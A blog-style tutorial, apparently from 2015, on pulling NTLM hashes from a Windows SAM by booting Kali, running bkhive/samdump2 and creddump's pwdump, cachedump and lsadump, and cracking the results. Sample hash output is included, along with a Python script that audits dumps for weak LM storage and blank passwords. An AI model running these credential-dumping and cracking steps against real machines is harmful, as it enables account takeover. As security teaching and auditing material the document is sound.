Extracting hashes from the Windows SAM with Kali

Author: admin | Category: Network security basics | Published: 2015-09-21 00:14

First, boot the machine into Kali from a USB drive.

fdisk -l                        list the disk partitions
mount -t ntfs /dev/sda1 /mnt    mount the partition holding the Windows installation as NTFS

df -k                           show partition usage; in the listing note:
1. the Windows disk
2. its mount point

cd /mnt                         enter the mount point
ls                              list its contents
cd WINDOWS/system32/config      enter the directory that holds the SAM


Use bkhive and samdump2

ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt    this yields the NTLM hashes


Tools I commonly use for cracking NTLM hashes:
1. ophcrack: runs NTLM hashes against rainbow tables, extremely efficient
2. hashcat: uses CPU + GPU to attack all kinds of hashes (brute force or a personal wordlist)
3. passwordpro: similar to hashcat but without GPU support; easy to use, reads wordlists quickly, supports many hash types
4. John the Ripper: recent versions support GPU, simple to use

You do not need many tools, just ones that work.
Download tools from the official site or the original author's blog where possible.

===========================================================================

creddump Package Description

creddump is a python tool to extract various credentials and secrets from Windows registry hives. It currently extracts:

  • LM and NT hashes (SYSKEY protected)
  • Cached domain passwords
  • LSA secrets

It essentially performs all the functions that bkhive/samdump2, cachedump, and lsadump2 do, but in a platform-independent way.

It is also the first tool that does all of these things in an offline way (actually, Cain & Abel does, but is not open source and is only available on Windows).

Source: https://code.google.com/p/creddump/

creddump Homepage | Kali creddump Repo

  • Author: Brendan Dolan-Gavitt
  • License: GPLv3

Tools included in the creddump package

cachedump – Dump cached credentials

root@kali:~# cachedump
usage: /usr/bin/cachedump <system hive> <security hive>

lsadump – Dump LSA secrets

root@kali:~# lsadump
usage: /usr/bin/lsadump <system hive> <security hive>

pwdump – Dump password hashes

root@kali:~# pwdump
usage: /usr/bin/pwdump <system hive> <SAM hive>

pwdump Usage Example

Dump the password hashes using the system (system) and sam (sam) hives:

root@kali:~# pwdump system sam
Administrator:500:41aa818b512a8c0e72381e4c174e281b:1896d0a309184775f67c14d14b5c365a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:667d6c58d451dbf236ae37ab1de3b9f7:af733642ab69e156ba0c219d3bbc3c83:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8dffa305e2bee837f279c2c0b082affb:::
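As an added example (not from the original post or the creddump project): a small Python audit script that parses the `user:RID:LM:NT:::` records that samdump2 (first section) and pwdump (above) both emit, and flags what a defender looks for in such a dump: accounts whose LM hash is still stored (the NoLMHash policy is not in effect) and accounts with a blank password. The empty-password hash constants are well-known values; the `svc_backup` line in the sample and the issue labels are constructed for this example.

```python
# Audit a pwdump/samdump2-style hash dump (user:RID:LM:NT:::).
# The two constants below are the LM and NT hashes of the empty string;
# they are well-known values, not page-specific data.
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of ""
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

# Sample dump: first two lines are from the pwdump example on this page,
# the svc_backup line is constructed for this example.
SAMPLE = """\
Administrator:500:41aa818b512a8c0e72381e4c174e281b:1896d0a309184775f67c14d14b5c365a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

@dataclass
class Record:
    user: str
    rid: int
    lm: str
    nt: str

def parse_pwdump(text):
    """Parse dump lines into Records; blank or malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append(Record(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return records

def audit(records):
    """Map each account with a finding to its list of issues (constructed labels)."""
    findings = {}
    for r in records:
        issues = []
        if r.lm != EMPTY_LM:
            issues.append("lm-hash-stored")   # LM storage enabled: weak, crackable format
        if r.nt == EMPTY_NT:
            issues.append("blank-password")   # account has an empty password
        if r.rid == 500 and issues:
            issues.append("builtin-admin")    # findings on the built-in Administrator
        if issues:
            findings[r.user] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit(parse_pwdump(SAMPLE)).items():
        print(user, ", ".join(issues))
```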

lsadump Usage Example

Dump the LSA secrets using the system (system) and security (security) hives:

root@kali:~# lsadump system security
_SC_ALG

_SC_Dnscache

_SC_upnphost

20ed87e2-3b82-4114-81f9-5e219ed4c481-SALEMHELPACCOUNT

_SC_WebClient

_SC_RpcLocator

0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID
0000   01 05 00 00 00 00 00 05 15 00 00 00 B6 44 E4 23    ………….D.#
0010   F4 50 BA 74 07 E5 3B 2B E8 03 00 00                .P.t..;+….

0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount
0000   00 38 00 48 00 6F 00 31 00 49 45 00 4A 00 26 00    E.J.&.8.H.o.1.I.
0010   00 63 00 72 00 48 00 68 00 53 6B 00 00 00          h.S.c.r.H.k…

_SC_MSDTC

_SC_SSDPSRV

_SC_Alerter

_SC_RpcSs

_SC_LmHosts

_SC_BthServ
